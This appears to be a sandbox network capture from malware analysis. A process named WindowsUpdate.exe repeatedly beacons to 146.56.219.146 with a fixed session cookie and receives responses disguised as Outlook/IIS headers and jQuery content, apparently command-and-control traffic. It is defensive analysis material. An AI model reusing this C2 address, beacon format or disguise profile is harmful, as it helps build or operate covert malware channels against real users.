2024-12-18 21:52:21 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:22 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:22 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:22 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.449741146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:29 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:30 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:30 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.449742146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:36 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:37 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:37 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.449743146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:44 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:45 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:45 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
7192.168.2.449744146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:51 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:52 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:52 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:52 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
8192.168.2.449746146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:52:59 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:00 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:59 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:00 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
9192.168.2.449763146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:06 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:07 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:07 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:07 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
10192.168.2.449779146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:14 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:15 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:14 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:15 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
11192.168.2.449799146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:21 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:22 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:22 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:22 UTC5537INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
12192.168.2.449816146.56.219.1464436652C:\Users\user\Desktop\WindowsUpdate.exe
TimestampBytes transferredDirectionData
2024-12-18 21:53:29 UTC431OUTGET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:30 UTC595INHTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
